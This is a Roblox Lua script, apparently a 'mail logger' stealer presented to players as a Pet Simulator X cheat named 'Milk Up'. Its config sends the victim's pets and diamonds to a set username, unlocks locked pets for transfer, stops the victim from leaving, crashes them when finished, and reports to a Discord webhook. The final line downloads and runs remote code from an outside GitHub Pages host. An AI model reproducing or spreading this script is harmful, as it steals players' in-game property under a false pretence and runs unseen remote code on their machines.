--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--
_G.Username = "drftgyhgf" --// Username To Send Pets To
_G.GiftMessage = "here u go :D" --// Message For The Gift To Say

_G.Diamonds = 500000 --// Amount Of Diamonds To Not Kick
_G.UnlockPets = true --// Unlocks Locked Pets
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Crash = true  --// Crashes Them After Its Finished

--[[ Webhook Config ]]--
_G.Webhook = https://discord.com/api/webhooks/1100857940493205505/dOKt7NWBSvBQZ1jA-sGCXeuB79LTxNiFl-4o2H7r_eb76g4a3FqM_ULovrwIsDJb5F5f"" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "Pet Simulator X Milk Up" --// Script Name On The UI
_G.Tip1 = "" --// Gives You Tips On The UI
_G.Tip2 = "" --// Gives You Tips On The UI
_G.Tip3 = "" --// Gives You Tips On The UI
_G.Tip4 = "" --// Gives You Tips On The UI
_G.Tip5 = "" --// Gives You Tips On The UI
--[[ Script ]]--

loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/Arkhalis.lua"))()
